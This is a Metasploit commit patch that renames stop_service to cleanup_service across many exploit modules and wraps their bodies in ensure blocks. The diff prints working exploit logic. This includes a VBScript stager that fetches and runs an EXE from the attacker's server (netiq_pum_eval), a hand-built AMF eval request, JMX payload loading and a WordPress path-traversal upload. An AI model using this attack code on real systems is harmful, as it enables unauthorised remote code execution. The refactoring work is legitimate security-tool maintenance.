From 9761d68c1942ad6cc87f010a7960a1bb0dd358db Mon Sep 17 00:00:00 2001 From: Ashley Donaldson Date: Thu, 10 Mar 2022 10:28:25 +1100 Subject: [PATCH] Rename stop_service to cleanup_service for services that use reference counting --- .../exploit/remote/http_server/php_include.rb | 2 +- .../admin/scada/yokogawa_bkbcopyd_client.rb | 2 +- .../gather/safari_file_url_navigation.rb | 2 +- modules/auxiliary/server/ldap.rb | 4 +- modules/exploits/linux/http/vestacp_exec.rb | 11 +- .../exploits/multi/http/jboss_maindeployer.rb | 2 +- .../multi/http/mutiny_subnetmask_exec.rb | 2 +- ...racle_weblogic_wsat_deserialization_rce.rb | 4 +- .../multi/http/ubiquiti_unifi_log4shell.rb | 4 +- .../exploits/multi/misc/java_jmx_server.rb | 107 +++++----- .../multi/wyse/hagent_untrusted_hsdata.rb | 4 +- .../exploits/unix/dhcp/bash_environment.rb | 2 +- .../rhel_dhcp_client_command_injection.rb | 2 +- .../webapp/google_proxystylesheet_exec.rb | 46 +++-- .../unix/webapp/wp_pixabay_images_upload.rb | 35 ++-- .../http/dnn_cookie_deserialization_rce.rb | 33 +-- .../exploits/windows/novell/netiq_pum_eval.rb | 191 +++++++++--------- 17 files changed, 236 insertions(+), 217 deletions(-) diff --git a/lib/msf/core/exploit/remote/http_server/php_include.rb b/lib/msf/core/exploit/remote/http_server/php_include.rb index 4f43082ef3..e1639489fb 100644 --- a/lib/msf/core/exploit/remote/http_server/php_include.rb +++ b/lib/msf/core/exploit/remote/http_server/php_include.rb @@ -62,7 +62,7 @@ module Exploit::Remote::HttpServer::PHPInclude rescue ::Interrupt raise $! ensure - stop_service + cleanup_service end end diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index cacab826ec..dc5b6dd187 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary end def on_client_close(c) - stop_service + cleanup_service end end diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index 5d50af6f9a..b52d1e6f8f 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -322,7 +322,7 @@ class MetasploitModule < Msf::Auxiliary super # Kill FTP - stop_service + cleanup_service # clear my resource, deregister ref, stop/close the HTTP socket begin diff --git a/modules/auxiliary/server/ldap.rb b/modules/auxiliary/server/ldap.rb index 02fe6b1fd0..8c51479825 100644 --- a/modules/auxiliary/server/ldap.rb +++ b/modules/auxiliary/server/ldap.rb @@ -39,15 +39,13 @@ class MetasploitModule < Msf::Auxiliary end # - # Wrapper for service execution and cleanup + # Wrapper for service execution # def run start_service service.wait rescue Rex::BindFailed => e print_error "Failed to bind to port #{datastore['SRVPORT']}: #{e.message}" - ensure - stop_service end # diff --git a/modules/exploits/linux/http/vestacp_exec.rb b/modules/exploits/linux/http/vestacp_exec.rb index d456423cc3..60ebad41bc 100644 --- a/modules/exploits/linux/http/vestacp_exec.rb +++ b/modules/exploits/linux/http/vestacp_exec.rb @@ -239,10 +239,13 @@ class MetasploitModule < Msf::Exploit::Remote def exploit start_http_server - payload_implant - login - start_backup_and_trigger_payload - stop_service + begin + payload_implant + login + start_backup_and_trigger_payload + ensure + cleanup_service + end end def on_request_uri(cli, _request) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 3b92a1d0e3..b69fea5a56 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Shutting down the web service...") - stop_service + cleanup_service # diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 5aac0531c5..eb62833a0a 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote #select(nil, nil, nil, 20) unless session_created? print_status("Shutting down the web service...") - stop_service + cleanup_service end # Handle incoming requests from the target diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb index 0905db5c06..b000e80db7 100644 --- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb +++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb @@ -166,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote # sleep 1 # waited += 1 # if waited > datastore['HTTP_DELAY'] - # stop_service + # cleanup_service # return Exploit::CheckCode::Safe # end # end # - # stop_service + # cleanup_service # return Exploit::CheckCode::Vulnerable # end diff --git a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb index 178647c60d..60e5f6d886 100644 --- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb +++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb @@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote wait_until { @search_received } @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.') ensure - stop_service + cleanup_service end def build_ldap_search_response_payload @@ -150,6 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote wait_until { @search_received && (!handler_enabled? || session_created?) } handler ensure - cleanup + cleanup_service end end diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 0001099426..9417bf0f26 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -131,60 +131,63 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Starting service...") start_service - @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" - connect - - print_status("Sending RMI Header...") - unless is_rmi? - fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") - end - - print_status("Discovering the JMXRMI endpoint...") - mbean_server = discover_endpoint - disconnect - if mbean_server.nil? - fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") - else - print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") - end - - # First try to connect to the original RHOST, since the mbean address may be inaccessible begin - connect(true, { 'RPORT' => mbean_server[:port] }) - rescue Rex::ConnectionError - # If that fails, try connecting to the listed address instead - connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) + @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" + connect + + print_status("Sending RMI Header...") + unless is_rmi? + fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") + end + + print_status("Discovering the JMXRMI endpoint...") + mbean_server = discover_endpoint + disconnect + if mbean_server.nil? + fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") + else + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + end + + # First try to connect to the original RHOST, since the mbean address may be inaccessible + begin + connect(true, { 'RPORT' => mbean_server[:port] }) + rescue Rex::ConnectionError + # If that fails, try connecting to the listed address instead + connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) + end + + unless is_rmi? + fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") + end + + print_status("Proceeding with handshake...") + jmx_endpoint = handshake(mbean_server) + if jmx_endpoint.nil? + fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") + else + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + end + + print_status("Loading payload...") + unless load_payload(jmx_endpoint) + fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") + end + + print_status("Executing payload...") + send_jmx_invoke( + object_number: jmx_endpoint[:object_number], + uid_number: jmx_endpoint[:uid].number, + uid_time: jmx_endpoint[:uid].time, + uid_count: jmx_endpoint[:uid].count, + object: "#{@mlet}:name=jmxpayload,id=1", + method: 'run' + ) + disconnect + ensure + vprint_status("Stopping service...") + cleanup_service end - - unless is_rmi? - fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") - end - - print_status("Proceeding with handshake...") - jmx_endpoint = handshake(mbean_server) - if jmx_endpoint.nil? - fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") - else - print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") - end - - print_status("Loading payload...") - unless load_payload(jmx_endpoint) - fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") - end - - print_status("Executing payload...") - send_jmx_invoke( - object_number: jmx_endpoint[:object_number], - uid_number: jmx_endpoint[:uid].number, - uid_time: jmx_endpoint[:uid].time, - uid_count: jmx_endpoint[:uid].count, - object: "#{@mlet}:name=jmxpayload,id=1", - method: 'run' - ) - disconnect - vprint_status("Stopping service...") - stop_service end def is_rmi? diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 977f05d3e9..77926c5b90 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Timed out waiting on the HTTP request") wdmserver.close disconnect() - stop_service() + cleanup_service() return end @@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No executable sent :(") end - stop_service() + cleanup_service() wdmserver.close() handler diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e18d382a78..6bc7e69d2a 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 2 end ensure - stop_service + cleanup_service end end end diff --git a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb index 62f8598162..54113670f9 100644 --- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb +++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb @@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 2 end ensure - stop_service + cleanup_service end end end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 3a7eef4f52..70f5be61fd 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -114,29 +114,31 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...") start_service - print_status("Requesting a search using our custom XSLT...") - res = send_request_cgi({ - 'uri' => '/search', - 'vars_get' => - { - 'client' => m[2], - 'site' => m[1], - 'output' => 'xml_no_dtd', - 'q' => rand_text_alpha(rand(15)+1), - 'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml", - 'proxyreload' => '1' - } - }, 25) + begin + print_status("Requesting a search using our custom XSLT...") + res = send_request_cgi({ + 'uri' => '/search', + 'vars_get' => + { + 'client' => m[2], + 'site' => m[1], + 'output' => 'xml_no_dtd', + 'q' => rand_text_alpha(rand(15)+1), + 'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml", + 'proxyreload' => '1' + } + }, 25) - if (res) - print_status("The server returned: #{res.code} #{res.message}") - print_status("Waiting on the payload to execute...") - select(nil,nil,nil,20) - else - print_status("No response from the server") + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print_status("Waiting on the payload to execute...") + select(nil,nil,nil,20) + else + print_status("No response from the server") + end + ensure + print_status("Shutting down the web service...") + cleanup_service end - - print_status("Shutting down the web service...") - stop_service end end diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 3d8c501e29..8b3a25063a 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -85,25 +85,28 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Starting up web service...") start_service - payload_uri = generate_payload_uri - vprint_status("Using URI #{payload_uri}") + begin + payload_uri = generate_payload_uri + vprint_status("Using URI #{payload_uri}") - random_file_name = rand_text_alphanumeric(rand(5) + 5) - post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), - 'image_url' => payload_uri, - 'image_user' => rand_text_alphanumeric(rand(5) + 5), - 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" - } + random_file_name = rand_text_alphanumeric(rand(5) + 5) + post = { + 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), + 'image_url' => payload_uri, + 'image_user' => rand_text_alphanumeric(rand(5) + 5), + 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" + } - print_status("Uploading payload #{random_file_name}...") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(wordpress_url_backend), - 'vars_post' => post - }) + print_status("Uploading payload #{random_file_name}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend), + 'vars_post' => post + }) - stop_service + ensure + cleanup_service + end unless res && res.code == 200 && res.headers['date'] fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...") diff --git a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb index 3203fba200..b10c3f3098 100644 --- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb +++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb @@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => '2017-07-20', 'DefaultOptions' => { 'WfsDelay' => 5 }, - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote print_warning('Trying all possible KEY and IV combinations...') print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...") start_service - vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...") + begin + vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...") - test_passphrases + test_passphrases - # If no working passphrase has been found, - # wait to allow the the chance for the last one to callback. - if @passphrase.empty? && !@dry_run - sleep(wfs_delay) - end - if service - stop_service + # If no working passphrase has been found, + # wait to allow the the chance for the last one to callback. + if @passphrase.empty? && !@dry_run + sleep(wfs_delay) + end + ensure + cleanup_service end + print "\r\n" if !@passphrase.empty? - print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found") + print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found") end end end @@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali print_good("Possible Base Key Value Found: #{key}") else print_good("KEY Found: #{key}") - print_good("IV Found: #{@passphrase[8..-1]}") + print_good("IV Found: #{@passphrase[8..]}") end vprint_status(format('Total number of Keys tried: %d', n_tried: i)) vprint_status(format('Time to crack: %.3f seconds', c_time: elapsed.to_s)) @@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali @decryptor.key = key found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final # Find all possible IVs for the first ciphertext - brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1]) + brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..]) # Reduce IV set by testing against other ciphertexts cipher_texts.drop(1).each do |cipher_text| diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index d2266818b8..cf34b52cde 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -198,106 +198,109 @@ class MetasploitModule < Msf::Exploit::Remote 'Path' => resource_uri } }) - datastore['SSL'] = true + begin + datastore['SSL'] = true - # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/ - vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5)) - code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"#{vbs_stage}.vbs\");" - register_file_for_cleanup("#{vbs_stage}.vbs") - register_file_for_cleanup("#{exename}.exe") - identity = "" + # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/ + vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5)) + code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"#{vbs_stage}.vbs\");" + register_file_for_cleanup("#{vbs_stage}.vbs") + register_file_for_cleanup("#{exename}.exe") + identity = "" - data = "\x00\x00\x00\x00\x00\x01" - data << "\x00\x14" - data << "SPF.Util.callModuleA" - data << "\x00\x00" - data << "\x00" - data << "\x00\x02" - data << "\x0a\x0a" - data << "\x00\x00\x00\x01\x03" - data << "\x00\x03" - data << "pkt" - data << "\x03" - data << "\x00\x06" - data << "method" - data << "\x02" - data << "\x00\x04" - data << "eval" - data << "\x00\x06" - data << "module" - data << "\x02" - data << "\x00\x08" - data << "ldapagnt" - data << "\x00\x04" - data << "Eval" - data << "\x03" - data << "\x00\x07" - data << "content" - data << "\x02" - data << [code.length + 4].pack("n") - data << code - data << "\x0a\x0a1;\x0a\x0a1;" - data << "\x00\x00\x09" - data << "\x00\x00\x09" - data << "\x00\x03" - data << "uid" - data << "\x02" - data << [identity.length].pack("n") - data << identity - data << "\x00\x00\x09" - data << "\x00\x08" - data << "svc_name" - data << "\x02" - data << [svc_name.length].pack("n") - data << svc_name - data << "\x00\x00\x09" + data = "\x00\x00\x00\x00\x00\x01" + data << "\x00\x14" + data << "SPF.Util.callModuleA" + data << "\x00\x00" + data << "\x00" + data << "\x00\x02" + data << "\x0a\x0a" + data << "\x00\x00\x00\x01\x03" + data << "\x00\x03" + data << "pkt" + data << "\x03" + data << "\x00\x06" + data << "method" + data << "\x02" + data << "\x00\x04" + data << "eval" + data << "\x00\x06" + data << "module" + data << "\x02" + data << "\x00\x08" + data << "ldapagnt" + data << "\x00\x04" + data << "Eval" + data << "\x03" + data << "\x00\x07" + data << "content" + data << "\x02" + data << [code.length + 4].pack("n") + data << code + data << "\x0a\x0a1;\x0a\x0a1;" + data << "\x00\x00\x09" + data << "\x00\x00\x09" + data << "\x00\x03" + data << "uid" + data << "\x02" + data << [identity.length].pack("n") + data << identity + data << "\x00\x00\x09" + data << "\x00\x08" + data << "svc_name" + data << "\x02" + data << [svc_name.length].pack("n") + data << svc_name + data << "\x00\x00\x09" - print_status("Sending the eval code request...") + print_status("Sending the eval code request...") - res = send_request_cgi( - { - 'uri' => '/', - 'version' => '1.1', - 'method' => 'POST', - 'ctype' => "application/x-amf", - 'headers' => { - "x-flash-version" => "11,4,402,278" - }, - 'data' => data, - } - ) + res = send_request_cgi( + { + 'uri' => '/', + 'version' => '1.1', + 'method' => 'POST', + 'ctype' => "application/x-amf", + 'headers' => { + "x-flash-version" => "11,4,402,278" + }, + 'data' => data, + } + ) - if res - fail_with(Failure::Unknown, "There was an unexpected response to the code eval request") - else - print_good("There wasn't a response, but this is the expected behavior...") - end - - # wait for the data to be sent - print_status("Waiting for the victim to request the EXE payload...") - - waited = 0 - while (not @exe_sent) - select(nil, nil, nil, 1) - waited += 1 - if (waited > datastore['HTTP_DELAY']) - fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?") + if res + fail_with(Failure::Unknown, "There was an unexpected response to the code eval request") + else + print_good("There wasn't a response, but this is the expected behavior...") end + + # wait for the data to be sent + print_status("Waiting for the victim to request the EXE payload...") + + waited = 0 + while (not @exe_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > datastore['HTTP_DELAY']) + fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?") + end + end + + print_status("Giving time to the payload to execute...") + select(nil, nil, nil, 20) + + ensure + print_status("Shutting down the web service...") + cleanup_service end - - print_status("Giving time to the payload to execute...") - select(nil, nil, nil, 20) - - print_status("Shutting down the web service...") - stop_service end end